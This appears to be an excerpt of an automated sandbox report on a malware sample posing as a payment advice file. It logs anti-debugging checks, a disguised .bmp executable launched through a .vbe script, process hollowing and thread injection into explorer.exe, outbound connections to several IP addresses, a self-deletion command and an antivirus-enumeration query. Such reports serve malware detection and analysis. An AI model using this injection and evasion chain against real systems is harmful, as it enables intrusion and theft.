          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D0887 mov eax, dword ptr fs:[00000030h]14_2_016D0887
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016CCB7E mov eax, dword ptr fs:[00000030h]14_2_016CCB7E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177EB50 mov eax, dword ptr fs:[00000030h]14_2_0177EB50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A2B57 mov eax, dword ptr fs:[00000030h]14_2_017A2B57
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A2B57 mov eax, dword ptr fs:[00000030h]14_2_017A2B57
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A2B57 mov eax, dword ptr fs:[00000030h]14_2_017A2B57
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A2B57 mov eax, dword ptr fs:[00000030h]14_2_017A2B57
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01784B4B mov eax, dword ptr fs:[00000030h]14_2_01784B4B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01784B4B mov eax, dword ptr fs:[00000030h]14_2_01784B4B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01778B42 mov eax, dword ptr fs:[00000030h]14_2_01778B42
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01766B40 mov eax, dword ptr fs:[00000030h]14_2_01766B40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01766B40 mov eax, dword ptr fs:[00000030h]14_2_01766B40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0179AB40 mov eax, dword ptr fs:[00000030h]14_2_0179AB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016C8B50 mov eax, dword ptr fs:[00000030h]14_2_016C8B50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FEB20 mov eax, dword ptr fs:[00000030h]14_2_016FEB20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FEB20 mov eax, dword ptr fs:[00000030h]14_2_016FEB20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01798B28 mov eax, dword ptr fs:[00000030h]14_2_01798B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01798B28 mov eax, dword ptr fs:[00000030h]14_2_01798B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174EB1D mov eax, dword ptr fs:[00000030h]14_2_0174EB1D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174EB1D mov eax, dword ptr fs:[00000030h]14_2_0174EB1D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174EB1D mov eax, dword ptr fs:[00000030h]14_2_0174EB1D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174EB1D mov eax, dword ptr fs:[00000030h]14_2_0174EB1D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174EB1D mov eax, dword ptr fs:[00000030h]14_2_0174EB1D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174EB1D mov eax, dword ptr fs:[00000030h]14_2_0174EB1D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174EB1D mov eax, dword ptr fs:[00000030h]14_2_0174EB1D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174EB1D mov eax, dword ptr fs:[00000030h]14_2_0174EB1D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174EB1D mov eax, dword ptr fs:[00000030h]14_2_0174EB1D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_017A4B00 mov eax, dword ptr fs:[00000030h]14_2_017A4B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175CBF0 mov eax, dword ptr fs:[00000030h]14_2_0175CBF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FEBFC mov eax, dword ptr fs:[00000030h]14_2_016FEBFC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D8BF0 mov eax, dword ptr fs:[00000030h]14_2_016D8BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D8BF0 mov eax, dword ptr fs:[00000030h]14_2_016D8BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D8BF0 mov eax, dword ptr fs:[00000030h]14_2_016D8BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D0BCD mov eax, dword ptr fs:[00000030h]14_2_016D0BCD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D0BCD mov eax, dword ptr fs:[00000030h]14_2_016D0BCD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D0BCD mov eax, dword ptr fs:[00000030h]14_2_016D0BCD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F0BCB mov eax, dword ptr fs:[00000030h]14_2_016F0BCB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F0BCB mov eax, dword ptr fs:[00000030h]14_2_016F0BCB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F0BCB mov eax, dword ptr fs:[00000030h]14_2_016F0BCB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177EBD0 mov eax, dword ptr fs:[00000030h]14_2_0177EBD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01784BB0 mov eax, dword ptr fs:[00000030h]14_2_01784BB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01784BB0 mov eax, dword ptr fs:[00000030h]14_2_01784BB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0BBE mov eax, dword ptr fs:[00000030h]14_2_016E0BBE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0BBE mov eax, dword ptr fs:[00000030h]14_2_016E0BBE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174CA72 mov eax, dword ptr fs:[00000030h]14_2_0174CA72
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174CA72 mov eax, dword ptr fs:[00000030h]14_2_0174CA72
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177EA60 mov eax, dword ptr fs:[00000030h]14_2_0177EA60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170CA6F mov eax, dword ptr fs:[00000030h]14_2_0170CA6F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170CA6F mov eax, dword ptr fs:[00000030h]14_2_0170CA6F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170CA6F mov eax, dword ptr fs:[00000030h]14_2_0170CA6F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0A5B mov eax, dword ptr fs:[00000030h]14_2_016E0A5B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0A5B mov eax, dword ptr fs:[00000030h]14_2_016E0A5B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D6A50 mov eax, dword ptr fs:[00000030h]14_2_016D6A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D6A50 mov eax, dword ptr fs:[00000030h]14_2_016D6A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D6A50 mov eax, dword ptr fs:[00000030h]14_2_016D6A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D6A50 mov eax, dword ptr fs:[00000030h]14_2_016D6A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D6A50 mov eax, dword ptr fs:[00000030h]14_2_016D6A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D6A50 mov eax, dword ptr fs:[00000030h]14_2_016D6A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D6A50 mov eax, dword ptr fs:[00000030h]14_2_016D6A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FEA2E mov eax, dword ptr fs:[00000030h]14_2_016FEA2E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170CA38 mov eax, dword ptr fs:[00000030h]14_2_0170CA38
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170CA24 mov eax, dword ptr fs:[00000030h]14_2_0170CA24
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F4A35 mov eax, dword ptr fs:[00000030h]14_2_016F4A35
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F4A35 mov eax, dword ptr fs:[00000030h]14_2_016F4A35
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175CA11 mov eax, dword ptr fs:[00000030h]14_2_0175CA11
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170AAEE mov eax, dword ptr fs:[00000030h]14_2_0170AAEE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170AAEE mov eax, dword ptr fs:[00000030h]14_2_0170AAEE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01704AD0 mov eax, dword ptr fs:[00000030h]14_2_01704AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01704AD0 mov eax, dword ptr fs:[00000030h]14_2_01704AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D0AD0 mov eax, dword ptr fs:[00000030h]14_2_016D0AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01726ACC mov eax, dword ptr fs:[00000030h]14_2_01726ACC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01726ACC mov eax, dword ptr fs:[00000030h]14_2_01726ACC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01726ACC mov eax, dword ptr fs:[00000030h]14_2_01726ACC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D8AA0 mov eax, dword ptr fs:[00000030h]14_2_016D8AA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0051F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0051F838
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0052C030 GetProcessHeap,0_2_0052C030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00409AA0 rdtsc 14_2_00409AA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040ACE0 LdrLoadDll,14_2_0040ACE0
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001EF3FF BlockInput,6_2_001EF3FF
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0051F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0051F838
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0051F9D5 SetUnhandledExceptionFilter,0_2_0051F9D5
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0051FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0051FBCA
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_00528EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00528EBD
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001A29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_001A29B2
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_00190BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00190BCF
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_00190D65 SetUnhandledExceptionFilter,6_2_00190D65
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_00190FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00190FB1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A56EC0 SetUnhandledExceptionFilter,16_2_00A56EC0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A56B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00A56B40

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 77.222.40.147 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.96.160.140 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 170.33.13.246 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 142.234.186.98 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.182.242 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.19 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 62.72.50.244 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 75.2.115.196 80Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Allocates memory in foreign processes
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
          Contains functionality to inject code into remote processes
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_3_010DD91A CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,6_3_010DD91A
          Sample uses process hollowing technique
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: A40000Jump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: EA8008Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 4084Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 4084Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001DBB02 SendInput,keybd_event,6_2_001DBB02
          Source: C:\Users\user\Desktop\Payment_Advice.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pis-e.vbe" Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ewdbwwfpdh.bmp fjrpidauk.jpgJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp ewdbwwfpdh.bmp fjrpidauk.jpgJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
          Source: Payment_Advice.exe, 00000000.00000003.1414188164.000000000829D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct")memstr_4ab2483e-7
          Source: Payment_Advice.exe, 00000000.00000003.1414188164.000000000829D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: for $objantivirusproduct in $colitemsmemstr_6d86952f-1
          Source: Payment_Advice.exe, 00000000.00000003.1417523916.0000000005A54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ( wj(,wjmemstr_654d7a77-b
          Source: Payment_Advice.exe, 00000000.00000003.1417523916.0000000005A54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,dwj,pwjmemstr_f2861b95-8
          Source: Payment_Advice.exe, 00000000.00000003.1417523916.0000000005A54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0hwj0twjmemstr_ab9741cf-3
          Source: Payment_Advice.exe, 00000000.00000003.1417523916.0000000005A54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |8xjarbgcazh-chscsdadeelenesfifrhehuisitjakonlnoplptromemstr_6224e127-8
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: occw7memstr_dfc61d34-2
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: occw7 memstr_56b0340c-3
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: cwdfqwmemstr_8849873b-1
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: [qw8-memstr_bf5ca5d6-5
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: dl*t-l1memstr_b9a9111f-9
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: tem32\kernelbase.dllmemstr_34fcb3b0-4
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: pi-ms-win-core-processthreads-l1-1-0;memstr_d89e381c-0
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ws\sysmemstr_e6280df9-b
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ~cw`qzmemstr_4e587337-0
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: c:\wdmemstr_9c0ea93f-2
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: c:\windows\s5memstr_7c7e58c5-4
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ft`qzmemstr_da687978-9
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: wow64memstr_ecef54f0-e
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: l;cw4fqwmemstr_62a09b38-1
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: occw2memstr_18ee81e9-0
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: occw2 @memstr_8e0e87fa-2
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: d{gw@memstr_a40928b5-f
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: dd{gw@memstr_7d29cfd2-6
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: dw4`3xmemstr_a434f640-5
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ebw`3xmemstr_8a563fd0-1
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: cbw/vmemstr_f0d2d2d1-4
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ]qw]qwmemstr_22f835ac-d
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: gfw`\bwmemstr_0bee1f67-e
          Source: Payment_Advice.exe, 00000000.00000000.1370322475.0000000000500000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: !this program cannot be run in dos mode.memstr_7ea00bd6-a
          Source: Payment_Advice.exe, 00000000.00000000.1370322475.0000000000500000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: rich<>memstr_540dc4f0-a
          Source: Payment_Advice.exe, 00000000.00000000.1370322475.0000000000500000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .textmemstr_40b983dc-0
          Source: Payment_Advice.exe, 00000000.00000000.1370322475.0000000000500000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `.rdatamemstr_03651486-e
          Source: Payment_Advice.exe, 00000000.00000000.1370322475.0000000000500000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `.rdatamemstr_1d70a78f-d
          Source: Payment_Advice.exe, 00000000.00000000.1370322475.0000000000500000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: @.datamemstr_36bf6c14-d
          Source: Payment_Advice.exe, 00000000.00000000.1370322475.0000000000500000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: @@.data gmemstr_d943050d-d
          Source: Payment_Advice.exe, 00000000.00000000.1370322475.0000000000500000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didatmemstr_01ce3aa4-4
          Source: Payment_Advice.exe, 00000000.00000000.1370322475.0000000000500000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rsrcmemstr_20c994ad-b
          Source: Payment_Advice.exe, 00000000.00000000.1370322475.0000000000500000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rsrcxmemstr_3d217621-5
          Source: Payment_Advice.exe, 00000000.00000000.1370322475.0000000000500000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: @.relocmemstr_6690732e-6
          Source: Payment_Advice.exe, 00000000.00000000.1370322475.0000000000500000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: @@.reloc<#memstr_4aa49642-d
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xewpnewmemstr_14dce786-0
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xewpnew'memstr_77d54866-6
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mmonpromemstr_d52ea4c6-7
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @uprog3memstr_795462aa-e
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @uprog33memstr_ee640747-8
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gram files (x86)\common filesmemstr_065d82d8-6
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: commonprogramw6432=c:\program files\common filesmemstr_ead75c48-b
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: computername=hubert-pcmemstr_31942d91-d
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: comspec=c:\win"memstr_f7be2f04-8
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gram files (x86)\common filescommonprogramw6432=c:\program files\common filescomputername=user-pccomspec=c:\win""memstr_53a5b1ac-5
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d.exememstr_f1f0095c-5
